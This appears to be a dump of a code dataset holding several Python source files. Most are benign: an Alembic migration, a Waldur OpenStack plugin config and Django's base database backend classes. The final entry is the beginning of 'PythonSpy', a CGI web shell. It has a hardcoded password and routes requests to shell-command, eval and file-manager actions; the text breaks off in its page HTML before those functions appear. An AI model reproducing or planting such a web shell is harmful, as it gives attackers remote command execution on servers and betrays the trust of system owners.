code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
|---|---|---|---|---|---|
"""adding territories or freely associated states flag to country code
Revision ID: 1fb19acc7d64
Revises: 0cf297fa927c
Create Date: 2019-04-16 14:32:40.284194
"""
# revision identifiers, used by Alembic.
revision = '1fb19acc7d64'
down_revision = '0cf297fa927c'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
def upgrade(engine_name):
    """Dispatch to the engine-specific upgrade routine.

    Looks up ``upgrade_<engine_name>`` in this module's globals and runs it;
    raises KeyError for an unknown engine name.
    """
    upgrader = globals()["upgrade_%s" % engine_name]
    upgrader()
def downgrade(engine_name):
    """Dispatch to the engine-specific downgrade routine.

    Looks up ``downgrade_<engine_name>`` in this module's globals and runs it;
    raises KeyError for an unknown engine name.
    """
    downgrader = globals()["downgrade_%s" % engine_name]
    downgrader()
def upgrade_data_broker():
    """Add the territory/freely-associated-state flag to country_code."""
    # ### commands auto generated by Alembic - please adjust! ###
    flag_column = sa.Column(
        'territory_free_state',
        sa.Boolean(),
        server_default='False',
        nullable=False,
    )
    op.add_column('country_code', flag_column)
    # ### end Alembic commands ###
# ### end Alembic commands ###
def downgrade_data_broker():
    """Remove the flag added by upgrade_data_broker."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('country_code', 'territory_free_state')
    # ### end Alembic commands ###
# ### end Alembic commands ###
|
fedspendingtransparency/data-act-broker-backend
|
dataactcore/migrations/versions/1fb19acc7d64_adding_territories_or_freely_associated_.py
|
Python
|
cc0-1.0
| 1,033
|
from waldur_core.core import WaldurExtension
class OpenStackTenantExtension(WaldurExtension):
    """Waldur extension entry point for the OpenStack tenant plugin."""

    class Settings:
        # wiki: https://opennode.atlassian.net/wiki/display/WD/OpenStack+plugin+configuration
        WALDUR_OPENSTACK_TENANT = {
            'MAX_CONCURRENT_PROVISION': {
                'OpenStackTenant.Instance': 4,
                'OpenStackTenant.Volume': 4,
                'OpenStackTenant.Snapshot': 4,
            },
        }

    @staticmethod
    def django_app():
        return 'waldur_openstack.openstack_tenant'

    @staticmethod
    def rest_urls():
        from .urls import register_in
        return register_in

    @staticmethod
    def celery_tasks():
        from datetime import timedelta

        # Every periodic task in this plugin runs on the same cadence and
        # takes no arguments, so build the beat schedule from a name map.
        every_ten_minutes = timedelta(minutes=10)
        task_paths = {
            'openstacktenant-schedule-backups': 'openstack_tenant.ScheduleBackups',
            'openstacktenant-delete-expired-backups': 'openstack_tenant.DeleteExpiredBackups',
            'openstacktenant-schedule-snapshots': 'openstack_tenant.ScheduleSnapshots',
            'openstacktenant-delete-expired-snapshots': 'openstack_tenant.DeleteExpiredSnapshots',
            'openstacktenant-set-erred-stuck-resources': 'openstack_tenant.SetErredStuckResources',
        }
        return {
            beat_name: {
                'task': task_path,
                'schedule': every_ten_minutes,
                'args': (),
            }
            for beat_name, task_path in task_paths.items()
        }

    @staticmethod
    def get_cleanup_executor():
        from .executors import OpenStackTenantCleanupExecutor
        return OpenStackTenantCleanupExecutor
|
opennode/nodeconductor-openstack
|
src/waldur_openstack/openstack_tenant/extension.py
|
Python
|
mit
| 1,984
|
import decimal
try:
import thread
except ImportError:
import dummy_thread as thread
from threading import local
from django.conf import settings
from django.db import DEFAULT_DB_ALIAS
from django.db.backends import util
from django.db.transaction import TransactionManagementError
from django.utils import datetime_safe
from django.utils.importlib import import_module
class BaseDatabaseWrapper(local):
    """
    Represents a database connection.

    Subclasses threading.local, so each thread using the wrapper gets its
    own connection and transaction state.
    """
    # Backend-specific BaseDatabaseOperations instance; set by subclasses.
    ops = None
    vendor = 'unknown'

    def __init__(self, settings_dict, alias=DEFAULT_DB_ALIAS):
        # `settings_dict` should be a dictionary containing keys such as
        # NAME, USER, etc. It's called `settings_dict` instead of `settings`
        # to disambiguate it from Django settings modules.
        self.connection = None          # lazily-opened DB-API connection
        self.queries = []               # query log filled by the debug cursor
        self.settings_dict = settings_dict
        self.alias = alias
        self.use_debug_cursor = None    # None means: follow settings.DEBUG

        # Transaction related attributes
        self.transaction_state = []     # stack of managed/auto flags
        self.savepoint_state = 0        # counter for generating savepoint ids
        self._dirty = None              # None = not under transaction management

    def __eq__(self, other):
        # Wrappers are equal when they refer to the same database alias.
        return self.alias == other.alias

    def __ne__(self, other):
        return not self == other

    def _commit(self):
        if self.connection is not None:
            return self.connection.commit()

    def _rollback(self):
        if self.connection is not None:
            return self.connection.rollback()

    def _enter_transaction_management(self, managed):
        """
        A hook for backend-specific changes required when entering manual
        transaction handling.
        """
        pass

    def _leave_transaction_management(self, managed):
        """
        A hook for backend-specific changes required when leaving manual
        transaction handling. Will usually be implemented only when
        _enter_transaction_management() is also required.
        """
        pass

    def _savepoint(self, sid):
        if not self.features.uses_savepoints:
            return
        self.cursor().execute(self.ops.savepoint_create_sql(sid))

    def _savepoint_rollback(self, sid):
        if not self.features.uses_savepoints:
            return
        self.cursor().execute(self.ops.savepoint_rollback_sql(sid))

    def _savepoint_commit(self, sid):
        if not self.features.uses_savepoints:
            return
        self.cursor().execute(self.ops.savepoint_commit_sql(sid))

    def enter_transaction_management(self, managed=True):
        """
        Enters transaction management for a running thread. It must be balanced with
        the appropriate leave_transaction_management call, since the actual state is
        managed as a stack.

        The state and dirty flag are carried over from the surrounding block or
        from the settings, if there is no surrounding block (dirty is always false
        when no current block is running).
        """
        if self.transaction_state:
            # Inherit the managed/auto flag from the enclosing block.
            self.transaction_state.append(self.transaction_state[-1])
        else:
            self.transaction_state.append(settings.TRANSACTIONS_MANAGED)
        if self._dirty is None:
            self._dirty = False
        self._enter_transaction_management(managed)

    def leave_transaction_management(self):
        """
        Leaves transaction management for a running thread. A dirty flag is carried
        over to the surrounding block, as a commit will commit all changes, even
        those from outside. (Commits are on connection level.)
        """
        self._leave_transaction_management(self.is_managed())
        if self.transaction_state:
            del self.transaction_state[-1]
        else:
            raise TransactionManagementError("This code isn't under transaction "
                "management")
        if self._dirty:
            # Changes were left pending inside the managed block: roll them
            # back and complain loudly rather than committing by accident.
            self.rollback()
            raise TransactionManagementError("Transaction managed block ended with "
                "pending COMMIT/ROLLBACK")
        self._dirty = False

    def is_dirty(self):
        """
        Returns True if the current transaction requires a commit for changes to
        happen.
        """
        return self._dirty

    def set_dirty(self):
        """
        Sets a dirty flag for the current thread and code streak. This can be used
        to decide in a managed block of code to decide whether there are open
        changes waiting for commit.
        """
        if self._dirty is not None:
            self._dirty = True
        else:
            raise TransactionManagementError("This code isn't under transaction "
                "management")

    def set_clean(self):
        """
        Resets a dirty flag for the current thread and code streak. This can be used
        to decide in a managed block of code to decide whether a commit or rollback
        should happen.
        """
        if self._dirty is not None:
            self._dirty = False
        else:
            raise TransactionManagementError("This code isn't under transaction management")
        self.clean_savepoints()

    def clean_savepoints(self):
        # Reset the counter used to generate unique savepoint ids.
        self.savepoint_state = 0

    def is_managed(self):
        """
        Checks whether the transaction manager is in manual or in auto state.
        """
        if self.transaction_state:
            return self.transaction_state[-1]
        return settings.TRANSACTIONS_MANAGED

    def managed(self, flag=True):
        """
        Puts the transaction manager into a manual state: managed transactions have
        to be committed explicitly by the user. If you switch off transaction
        management and there is a pending commit/rollback, the data will be
        commited.
        """
        top = self.transaction_state
        if top:
            top[-1] = flag
            # Switching back to auto-commit flushes any pending changes.
            if not flag and self.is_dirty():
                self._commit()
                self.set_clean()
        else:
            raise TransactionManagementError("This code isn't under transaction "
                "management")

    def commit_unless_managed(self):
        """
        Commits changes if the system is not in managed transaction mode.
        """
        if not self.is_managed():
            self._commit()
            self.clean_savepoints()
        else:
            # Under manual management the caller commits; just record that
            # there are pending changes.
            self.set_dirty()

    def rollback_unless_managed(self):
        """
        Rolls back changes if the system is not in managed transaction mode.
        """
        if not self.is_managed():
            self._rollback()
        else:
            self.set_dirty()

    def commit(self):
        """
        Does the commit itself and resets the dirty flag.
        """
        self._commit()
        self.set_clean()

    def rollback(self):
        """
        This function does the rollback itself and resets the dirty flag.
        """
        self._rollback()
        self.set_clean()

    def savepoint(self):
        """
        Creates a savepoint (if supported and required by the backend) inside the
        current transaction. Returns an identifier for the savepoint that will be
        used for the subsequent rollback or commit.
        """
        thread_ident = thread.get_ident()
        self.savepoint_state += 1
        # Thread ids can be negative on some platforms; strip any '-' so the
        # generated savepoint id stays a valid SQL identifier.
        tid = str(thread_ident).replace('-', '')
        sid = "s%s_x%d" % (tid, self.savepoint_state)
        self._savepoint(sid)
        return sid

    def savepoint_rollback(self, sid):
        """
        Rolls back the most recent savepoint (if one exists). Does nothing if
        savepoints are not supported.
        """
        if self.savepoint_state:
            self._savepoint_rollback(sid)

    def savepoint_commit(self, sid):
        """
        Commits the most recent savepoint (if one exists). Does nothing if
        savepoints are not supported.
        """
        if self.savepoint_state:
            self._savepoint_commit(sid)

    def close(self):
        # Close and forget the underlying connection; no-op when none is open.
        if self.connection is not None:
            self.connection.close()
            self.connection = None

    def cursor(self):
        # Use the debug (query-logging) cursor when explicitly requested, or
        # when settings.DEBUG is on and no explicit choice has been made.
        if (self.use_debug_cursor or
            (self.use_debug_cursor is None and settings.DEBUG)):
            cursor = self.make_debug_cursor(self._cursor())
        else:
            cursor = util.CursorWrapper(self._cursor(), self)
        return cursor

    def make_debug_cursor(self, cursor):
        return util.CursorDebugWrapper(cursor, self)
class BaseDatabaseFeatures(object):
    """
    Describes which optional database features a backend supports.

    Most attributes are static capability flags; the ones at the bottom can
    only be determined against a live connection and are filled in by
    confirm().
    """
    allows_group_by_pk = False
    # True if django.db.backend.utils.typecast_timestamp is used on values
    # returned from dates() calls.
    needs_datetime_string_cast = True
    empty_fetchmany_value = []
    update_can_self_select = True

    # Does the backend distinguish between '' and None?
    interprets_empty_strings_as_nulls = False

    # Does the backend allow inserting duplicate rows when a unique_together
    # constraint exists, but one of the unique_together columns is NULL?
    ignores_nulls_in_unique_constraints = True

    can_use_chunked_reads = True
    can_return_id_from_insert = False
    uses_autocommit = False
    uses_savepoints = False

    # If True, don't use integer foreign keys referring to, e.g., positive
    # integer primary keys.
    related_fields_match_type = False
    allow_sliced_subqueries = True

    supports_joins = True
    distinguishes_insert_from_update = True
    supports_deleting_related_objects = True
    supports_select_related = True

    # Does the default test database allow multiple connections?
    # Usually an indication that the test database is in-memory
    test_db_allows_multiple_connections = True

    # Can an object be saved without an explicit primary key?
    supports_unspecified_pk = False

    # Can a fixture contain forward references? i.e., are
    # FK constraints checked at the end of transaction, or
    # at the end of each save operation?
    supports_forward_references = True

    # Does a dirty transaction need to be rolled back
    # before the cursor can be used again?
    requires_rollback_on_dirty_transaction = False

    # Does the backend allow very long model names without error?
    supports_long_model_names = True

    # Is there a REAL datatype in addition to floats/doubles?
    has_real_datatype = False
    supports_subqueries_in_group_by = True
    supports_bitwise_or = True

    # Do time/datetime fields have microsecond precision?
    supports_microsecond_precision = True

    # Does the __regex lookup support backreferencing and grouping?
    supports_regex_backreferencing = True

    # Can date/datetime lookups be performed using a string?
    supports_date_lookup_using_string = True

    # Can datetimes with timezones be used?
    supports_timezones = True

    # When performing a GROUP BY, is an ORDER BY NULL required
    # to remove any ordering?
    requires_explicit_null_ordering_when_grouping = False

    # Is there a 1000 item limit on query parameters?
    supports_1000_query_parameters = True

    # Can an object have a primary key of 0? MySQL says No.
    allows_primary_key_0 = True

    # Do we need to NULL a ForeignKey out, or can the constraint check be
    # deferred
    can_defer_constraint_checks = False

    # date_interval_sql can properly handle mixed Date/DateTime fields and timedeltas
    supports_mixed_date_datetime_comparisons = True

    # Features that need to be confirmed at runtime
    # Cache whether the confirmation has been performed.
    _confirmed = False
    supports_transactions = None
    supports_stddev = None
    can_introspect_foreign_keys = None

    def __init__(self, connection):
        # `connection` is the BaseDatabaseWrapper this instance describes.
        self.connection = connection

    def confirm(self):
        "Perform manual checks of any database features that might vary between installs"
        self._confirmed = True
        self.supports_transactions = self._supports_transactions()
        self.supports_stddev = self._supports_stddev()
        self.can_introspect_foreign_keys = self._can_introspect_foreign_keys()

    def _supports_transactions(self):
        "Confirm support for transactions"
        cursor = self.connection.cursor()
        cursor.execute('CREATE TABLE ROLLBACK_TEST (X INT)')
        self.connection._commit()
        cursor.execute('INSERT INTO ROLLBACK_TEST (X) VALUES (8)')
        self.connection._rollback()
        cursor.execute('SELECT COUNT(X) FROM ROLLBACK_TEST')
        count, = cursor.fetchone()
        cursor.execute('DROP TABLE ROLLBACK_TEST')
        self.connection._commit()
        # If the INSERT was undone by the rollback, transactions work.
        return count == 0

    def _supports_stddev(self):
        "Confirm support for STDDEV and related stats functions"
        class StdDevPop(object):
            sql_function = 'STDDEV_POP'

        # BUG FIX: this used to assign self.supports_stddev = False in the
        # except branch and fall off the end (returning None), so confirm()
        # always overwrote the flag with None regardless of actual support.
        # Return an explicit boolean, which is what confirm() expects.
        try:
            self.connection.ops.check_aggregate_support(StdDevPop())
        except NotImplementedError:
            return False
        return True

    def _can_introspect_foreign_keys(self):
        "Confirm support for introspected foreign keys"
        # Every database can do this reliably, except MySQL,
        # which can't do it for MyISAM tables
        return True
class BaseDatabaseOperations(object):
    """
    This class encapsulates all backend-specific differences, such as the way
    a backend performs ordering or calculates the ID of a recently-inserted
    row.
    """
    # Dotted path to the module that provides SQLCompiler classes; resolved
    # lazily by compiler().
    compiler_module = "django.db.models.sql.compiler"

    def __init__(self):
        # Cache for the lazily-imported compiler module (see compiler()).
        self._cache = None

    def autoinc_sql(self, table, column):
        """
        Returns any SQL needed to support auto-incrementing primary keys, or
        None if no SQL is necessary.

        This SQL is executed when a table is created.
        """
        return None

    def date_extract_sql(self, lookup_type, field_name):
        """
        Given a lookup_type of 'year', 'month' or 'day', returns the SQL that
        extracts a value from the given date field field_name.
        """
        raise NotImplementedError()

    def date_interval_sql(self, sql, connector, timedelta):
        """
        Implements the date interval functionality for expressions
        """
        raise NotImplementedError()

    def date_trunc_sql(self, lookup_type, field_name):
        """
        Given a lookup_type of 'year', 'month' or 'day', returns the SQL that
        truncates the given date field field_name to a DATE object with only
        the given specificity.
        """
        raise NotImplementedError()

    def datetime_cast_sql(self):
        """
        Returns the SQL necessary to cast a datetime value so that it will be
        retrieved as a Python datetime object instead of a string.

        This SQL should include a '%s' in place of the field's name.
        """
        return "%s"

    def deferrable_sql(self):
        """
        Returns the SQL necessary to make a constraint "initially deferred"
        during a CREATE TABLE statement.
        """
        return ''

    def drop_foreignkey_sql(self):
        """
        Returns the SQL command that drops a foreign key.
        """
        return "DROP CONSTRAINT"

    def drop_sequence_sql(self, table):
        """
        Returns any SQL necessary to drop the sequence for the given table.
        Returns None if no SQL is necessary.
        """
        return None

    def fetch_returned_insert_id(self, cursor):
        """
        Given a cursor object that has just performed an INSERT...RETURNING
        statement into a table that has an auto-incrementing ID, returns the
        newly created ID.
        """
        return cursor.fetchone()[0]

    def field_cast_sql(self, db_type):
        """
        Given a column type (e.g. 'BLOB', 'VARCHAR'), returns the SQL necessary
        to cast it before using it in a WHERE statement. Note that the
        resulting string should contain a '%s' placeholder for the column being
        searched against.
        """
        return '%s'

    def force_no_ordering(self):
        """
        Returns a list used in the "ORDER BY" clause to force no ordering at
        all. Returning an empty list means that nothing will be included in the
        ordering.
        """
        return []

    def fulltext_search_sql(self, field_name):
        """
        Returns the SQL WHERE clause to use in order to perform a full-text
        search of the given field_name. Note that the resulting string should
        contain a '%s' placeholder for the value being searched against.
        """
        raise NotImplementedError('Full-text search is not implemented for this database backend')

    def last_executed_query(self, cursor, sql, params):
        """
        Returns a string of the query last executed by the given cursor, with
        placeholders replaced with actual values.

        `sql` is the raw query containing placeholders, and `params` is the
        sequence of parameters. These are used by default, but this method
        exists for database backends to provide a better implementation
        according to their own quoting schemes.
        """
        from django.utils.encoding import smart_unicode, force_unicode

        # Convert params to contain Unicode values.
        to_unicode = lambda s: force_unicode(s, strings_only=True, errors='replace')
        if isinstance(params, (list, tuple)):
            u_params = tuple([to_unicode(val) for val in params])
        else:
            u_params = dict([(to_unicode(k), to_unicode(v)) for k, v in params.items()])

        # NOTE: this is a debugging aid only; the substituted string is not
        # guaranteed to be valid, escaped SQL.
        return smart_unicode(sql) % u_params

    def last_insert_id(self, cursor, table_name, pk_name):
        """
        Given a cursor object that has just performed an INSERT statement into
        a table that has an auto-incrementing ID, returns the newly created ID.

        This method also receives the table name and the name of the primary-key
        column.
        """
        return cursor.lastrowid

    def lookup_cast(self, lookup_type):
        """
        Returns the string to use in a query when performing lookups
        ("contains", "like", etc). The resulting string should contain a '%s'
        placeholder for the column being searched against.
        """
        return "%s"

    def max_in_list_size(self):
        """
        Returns the maximum number of items that can be passed in a single 'IN'
        list condition, or None if the backend does not impose a limit.
        """
        return None

    def max_name_length(self):
        """
        Returns the maximum length of table and column names, or None if there
        is no limit.
        """
        return None

    def no_limit_value(self):
        """
        Returns the value to use for the LIMIT when we are wanting "LIMIT
        infinity". Returns None if the limit clause can be omitted in this case.
        """
        raise NotImplementedError

    def pk_default_value(self):
        """
        Returns the value to use during an INSERT statement to specify that
        the field should use its default value.
        """
        return 'DEFAULT'

    def process_clob(self, value):
        """
        Returns the value of a CLOB column, for backends that return a locator
        object that requires additional processing.
        """
        return value

    def return_insert_id(self):
        """
        For backends that support returning the last insert ID as part
        of an insert query, this method returns the SQL and params to
        append to the INSERT query. The returned fragment should
        contain a format string to hold the appropriate column.
        """
        # Base implementation returns None: no RETURNING-style support.
        pass

    def compiler(self, compiler_name):
        """
        Returns the SQLCompiler class corresponding to the given name,
        in the namespace corresponding to the `compiler_module` attribute
        on this backend.
        """
        # Import the compiler module once and cache it for later lookups.
        if self._cache is None:
            self._cache = import_module(self.compiler_module)
        return getattr(self._cache, compiler_name)

    def quote_name(self, name):
        """
        Returns a quoted version of the given table, index or column name. Does
        not quote the given name if it's already been quoted.
        """
        raise NotImplementedError()

    def random_function_sql(self):
        """
        Returns a SQL expression that returns a random value.
        """
        return 'RANDOM()'

    def regex_lookup(self, lookup_type):
        """
        Returns the string to use in a query when performing regular expression
        lookups (using "regex" or "iregex"). The resulting string should
        contain a '%s' placeholder for the column being searched against.

        If the feature is not supported (or part of it is not supported), a
        NotImplementedError exception can be raised.
        """
        raise NotImplementedError

    def savepoint_create_sql(self, sid):
        """
        Returns the SQL for starting a new savepoint. Only required if the
        "uses_savepoints" feature is True. The "sid" parameter is a string
        for the savepoint id.
        """
        raise NotImplementedError

    def savepoint_commit_sql(self, sid):
        """
        Returns the SQL for committing the given savepoint.
        """
        raise NotImplementedError

    def savepoint_rollback_sql(self, sid):
        """
        Returns the SQL for rolling back the given savepoint.
        """
        raise NotImplementedError

    def sql_flush(self, style, tables, sequences):
        """
        Returns a list of SQL statements required to remove all data from
        the given database tables (without actually removing the tables
        themselves).

        The `style` argument is a Style object as returned by either
        color_style() or no_style() in django.core.management.color.
        """
        raise NotImplementedError()

    def sequence_reset_sql(self, style, model_list):
        """
        Returns a list of the SQL statements required to reset sequences for
        the given models.

        The `style` argument is a Style object as returned by either
        color_style() or no_style() in django.core.management.color.
        """
        return [] # No sequence reset required by default.

    def start_transaction_sql(self):
        """
        Returns the SQL statement required to start a transaction.
        """
        return "BEGIN;"

    def end_transaction_sql(self, success=True):
        # Returns the SQL statement that ends a transaction: COMMIT on
        # success, ROLLBACK otherwise.
        if not success:
            return "ROLLBACK;"
        return "COMMIT;"

    def tablespace_sql(self, tablespace, inline=False):
        """
        Returns the SQL that will be appended to tables or rows to define
        a tablespace. Returns '' if the backend doesn't use tablespaces.
        """
        return ''

    def prep_for_like_query(self, x):
        """Prepares a value for use in a LIKE query."""
        from django.utils.encoding import smart_unicode
        # Escape backslash first, then the LIKE wildcards % and _.
        return smart_unicode(x).replace("\\", "\\\\").replace("%", "\%").replace("_", "\_")

    # Same as prep_for_like_query(), but called for "iexact" matches, which
    # need not necessarily be implemented using "LIKE" in the backend.
    prep_for_iexact_query = prep_for_like_query

    def value_to_db_auto(self, value):
        """
        Transform a value to an object compatible with the auto field required
        by the backend driver for auto columns.
        """
        if value is None:
            return None
        return int(value)

    def value_to_db_date(self, value):
        """
        Transform a date value to an object compatible with what is expected
        by the backend driver for date columns.
        """
        if value is None:
            return None
        return datetime_safe.new_date(value).strftime('%Y-%m-%d')

    def value_to_db_datetime(self, value):
        """
        Transform a datetime value to an object compatible with what is expected
        by the backend driver for datetime columns.
        """
        if value is None:
            return None
        # unicode() is the Python 2 builtin; this module predates Python 3.
        return unicode(value)

    def value_to_db_time(self, value):
        """
        Transform a datetime value to an object compatible with what is expected
        by the backend driver for time columns.
        """
        if value is None:
            return None
        return unicode(value)

    def value_to_db_decimal(self, value, max_digits, decimal_places):
        """
        Transform a decimal.Decimal value to an object compatible with what is
        expected by the backend driver for decimal (numeric) columns.
        """
        if value is None:
            return None
        return util.format_number(value, max_digits, decimal_places)

    def year_lookup_bounds(self, value):
        """
        Returns a two-elements list with the lower and upper bound to be used
        with a BETWEEN operator to query a field value using a year lookup

        `value` is an int, containing the looked-up year.
        """
        first = '%s-01-01 00:00:00'
        second = '%s-12-31 23:59:59.999999'
        return [first % value, second % value]

    def year_lookup_bounds_for_date_field(self, value):
        """
        Returns a two-elements list with the lower and upper bound to be used
        with a BETWEEN operator to query a DateField value using a year lookup

        `value` is an int, containing the looked-up year.

        By default, it just calls `self.year_lookup_bounds`. Some backends need
        this hook because on their DB date fields can't be compared to values
        which include a time part.
        """
        return self.year_lookup_bounds(value)

    def convert_values(self, value, field):
        """Coerce the value returned by the database backend into a consistent type that
        is compatible with the field type.
        """
        internal_type = field.get_internal_type()
        if internal_type == 'DecimalField':
            return value
        elif internal_type and internal_type.endswith('IntegerField') or internal_type == 'AutoField':
            return int(value)
        elif internal_type in ('DateField', 'DateTimeField', 'TimeField'):
            return value
        # No field, or the field isn't known to be a decimal or integer
        # Default to a float
        return float(value)

    def check_aggregate_support(self, aggregate_func):
        """Check that the backend supports the provided aggregate

        This is used on specific backends to rule out known aggregates
        that are known to have faulty implementations. If the named
        aggregate function has a known problem, the backend should
        raise NotImplemented.
        """
        pass

    def combine_expression(self, connector, sub_expressions):
        """Combine a list of subexpressions into a single expression, using
        the provided connecting operator. This is required because operators
        can vary between backends (e.g., Oracle with %% and &) and between
        subexpression types (e.g., date expressions)
        """
        conn = ' %s ' % connector
        return conn.join(sub_expressions)
class BaseDatabaseIntrospection(object):
    """
    This class encapsulates all backend-specific introspection utilities
    """
    # Maps backend column-type codes to Django field class names; populated
    # by subclasses.
    data_types_reverse = {}

    def __init__(self, connection):
        # `connection` is a BaseDatabaseWrapper instance.
        self.connection = connection

    def get_field_type(self, data_type, description):
        """Hook for a database backend to use the cursor description to
        match a Django field type to a database column.

        For Oracle, the column data_type on its own is insufficient to
        distinguish between a FloatField and IntegerField, for example."""
        return self.data_types_reverse[data_type]

    def table_name_converter(self, name):
        """Apply a conversion to the name for the purposes of comparison.

        The default table name converter is for case sensitive comparison.
        """
        return name

    def table_names(self):
        "Returns a list of names of all tables that exist in the database."
        cursor = self.connection.cursor()
        return self.get_table_list(cursor)

    def django_table_names(self, only_existing=False):
        """
        Returns a list of all table names that have associated Django models and
        are in INSTALLED_APPS.

        If only_existing is True, the resulting list will only include the tables
        that actually exist in the database.
        """
        from django.db import models, router
        tables = set()
        for app in models.get_apps():
            for model in models.get_models(app):
                # Skip unmanaged models and models routed to other databases.
                if not model._meta.managed:
                    continue
                if not router.allow_syncdb(self.connection.alias, model):
                    continue
                tables.add(model._meta.db_table)
                tables.update([f.m2m_db_table() for f in model._meta.local_many_to_many])
        if only_existing:
            existing_tables = self.table_names()
            tables = [
                t
                for t in tables
                if self.table_name_converter(t) in existing_tables
            ]
        return tables

    def installed_models(self, tables):
        "Returns a set of all models represented by the provided list of table names."
        from django.db import models, router
        all_models = []
        for app in models.get_apps():
            for model in models.get_models(app):
                if router.allow_syncdb(self.connection.alias, model):
                    all_models.append(model)
        # NOTE: relies on Python 2's map() returning a list; under Python 3
        # this would be a one-shot iterator and the repeated membership tests
        # below would misbehave.
        tables = map(self.table_name_converter, tables)
        return set([
            m for m in all_models
            if self.table_name_converter(m._meta.db_table) in tables
        ])

    def sequence_list(self):
        "Returns a list of information about all DB sequences for all models in all apps."
        from django.db import models, router
        apps = models.get_apps()
        sequence_list = []
        for app in apps:
            for model in models.get_models(app):
                if not model._meta.managed:
                    continue
                if not router.allow_syncdb(self.connection.alias, model):
                    continue
                for f in model._meta.local_fields:
                    if isinstance(f, models.AutoField):
                        sequence_list.append({'table': model._meta.db_table, 'column': f.column})
                        break # Only one AutoField is allowed per model, so don't bother continuing.
                for f in model._meta.local_many_to_many:
                    # If this is an m2m using an intermediate table,
                    # we don't need to reset the sequence.
                    if f.rel.through is None:
                        sequence_list.append({'table': f.m2m_db_table(), 'column': None})
        return sequence_list
class BaseDatabaseClient(object):
    """
    Encapsulates the backend-specific logic for launching a command-line
    shell against the database.
    """
    # Name of the client executable (e.g. "psql").  Subclasses must
    # override this with a real value.
    executable_name = None

    def __init__(self, connection):
        # `connection` is an instance of BaseDatabaseWrapper.
        self.connection = connection

    def runshell(self):
        raise NotImplementedError()
class BaseDatabaseValidation(object):
    """
    Encapsulates all backend-specific model validation.
    """
    def __init__(self, connection):
        self.connection = connection

    def validate_field(self, errors, opts, f):
        """Hook for backends to report field-level problems.

        The base implementation performs no backend-specific validation and
        accepts every field unchanged.
        """
        return None
|
liqi328/rjrepaircompany
|
django/db/backends/__init__.py
|
Python
|
bsd-3-clause
| 31,617
|
#!C:/Python26/python.exe
# -*- coding: utf-8 -*-
# enable debugging
import cgi
import os
import sys
import time
import re
import socket
import stat
import StringIO
import subprocess
import time
import itertools
from os import environ
form = cgi.FieldStorage()

# ===================== Program configuration =====================
admin={}
# Whether password authentication is required: True means a login is
# required, False skips the check (the options below then have no effect).
admin['check'] = True
admin['pass'] = '123456'
# If you have special requirements for the cookie scope, or login does not
# work correctly, adjust the variables below; otherwise keep the defaults.
# cookie name prefix
admin['cookiepre'] = '';
# cookie domain
admin['cookiedomain'] = '';
# cookie path
admin['cookiepath'] = '/';
# cookie lifetime in seconds
admin['cookielife'] = 86400;
# ===================== End of configuration =====================

# Basename of this script, used to build self-referencing URLs/forms.
# NOTE(review): `self` is a confusing name for a module-level variable.
self = os.path.basename(__file__)
timestamp = time.time()
def getcookie(key):
    """Return the value of cookie `key` from the HTTP_COOKIE header, or "".

    Fixes over the original:
      * pairs are stripped of surrounding whitespace, so cookies after the
        first one ("a=1; b=2" — note the space) are actually found;
      * only the first '=' splits name from value, so values containing '='
        no longer raise ValueError;
      * uses `in` instead of the Python-2-only dict.has_key().
    """
    if 'HTTP_COOKIE' in environ:
        for cookie in environ['HTTP_COOKIE'].split(';'):
            k, _, v = cookie.strip().partition('=')
            if key == k:
                return v
    return ""
def getvalue(key):
    """Return the submitted form value for `key`, or "" when absent.

    Uses `key in form` instead of the Python-2-only form.has_key().
    """
    if key in form:
        return form.getvalue(key)
    return ""
def tryExcept(fun):
    """Decorator that makes `fun` best-effort: exceptions are swallowed.

    Fixes over the original:
      * accepts any call signature, not exactly one positional argument;
      * passes the wrapped function's return value through on success
        (None is returned on failure, as before);
      * catches Exception rather than a bare except, so SystemExit and
        KeyboardInterrupt still propagate.
    """
    def wrapper(*args, **kwargs):
        try:
            return fun(*args, **kwargs)
        except Exception:
            # Deliberate best-effort behaviour: ignore the failure.
            return None
    return wrapper
def handler():
    """Route the request to the page matching the `action` form field."""
    routes = {
        "": do_file,
        "file": do_file,
        "shell": do_shell,
        "env": do_env,
        "eval": do_eval,
    }
    page = routes.get(getvalue("action"))
    if page is not None:
        page()
# Running row counter used by bg() to alternate table-row CSS classes.
bgc = 0

def bg():
    """Return 'alt1'/'alt2' alternately, for zebra-striped table rows."""
    global bgc
    bgc += 1
    return ['alt1', 'alt2'][bgc % 2]
def loginpage():
    """Emit the password login form shown before authentication.

    Uses the parenthesized print form, which produces identical output on
    Python 2 and is valid syntax on Python 3 (the bare `print loginHtml`
    statement is Python-2-only).
    """
    loginHtml = """
<style type="text/css">
input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
</style>
<form method="POST" action="">
<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
<input type="hidden" name="doing" value="login">
<input type="submit" value="Login">
</form>
"""
    print(loginHtml)
def index():
    """Render the shared page chrome, then dispatch via handler().

    Looks up the client address/hostname from the CGI environment and prints
    the header/navigation HTML.  Fixes over the original:
      * `in environ` instead of the Python-2-only environ.has_key();
      * parenthesized print (identical output on Python 2, valid on 3);
      * the reverse-DNS lookup is guarded — an unresolvable address used to
        raise socket.herror and kill the whole page.
    """
    addr, host = "", ""
    if 'REMOTE_ADDR' in environ:
        addr = environ['REMOTE_ADDR']
    if 'REMOTE_HOST' in environ:
        host = environ['REMOTE_HOST']
    else:
        try:
            host = socket.gethostbyaddr(addr)[0]
        except socket.error:
            # Fall back to the bare address rather than crashing the page.
            host = addr
    html = """
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gbk">
<title>PythonSpy</title>
<style type="text/css">
body,td{font: 12px Arial,Tahoma;line-height: 16px;}
.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
a {color: #00f;text-decoration:underline;}
a:hover{color: #f00;text-decoration:none;}
.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}
